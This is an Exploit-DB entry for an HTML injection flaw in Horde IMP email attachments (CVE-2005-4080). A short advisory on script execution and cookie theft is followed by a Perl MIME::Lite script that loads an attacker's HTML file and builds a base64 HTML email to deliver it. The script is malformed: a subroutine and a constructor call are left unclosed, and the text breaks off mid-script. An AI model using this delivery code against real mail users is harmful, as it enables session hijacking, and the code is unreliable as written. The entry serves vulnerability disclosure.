Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability

ID EDB-ID:26741
Type exploitdb
Reporter SEC Consult
Modified 2005-12-06T00:00:00


Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability. CVE-2005-4080 . Remote exploit for linux platform

                                            source: http://www.securityfocus.com/bid/15730/info

Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

Reports indicate this issue is only present when viewing IMP content with the Microsoft Internet Explorer Web browser. 

# MIME::Liet SMTP client by C3PO
   use strict;
   use MIME::Base64;
   use MIME::Lite;
#                    load_file
   sub load_file{
      my($file) = shift;
      open(IN, $file) || die("Can't open $file $!");
      binmode IN;
      read(IN, $Body, -s $file);
      return $Body;
#                      main
   my $c = load_file('\Xploits\horder\passed.htm'); #content
   my $m = MIME::Lite->new(
                 From    =>'mail@domain.zone',
                 To      =>'mail@domain.zone',
                 Subject =>'Horde',
                 Date    =>"Tue, 17 Dec 2002 22:00:02 +0300",
                 Type    =>"text/html",
                 Data    => $c,
                 Encoding =>'base64'
  $m->attr('content-type.charset' => 'windows-1251'); #not necessary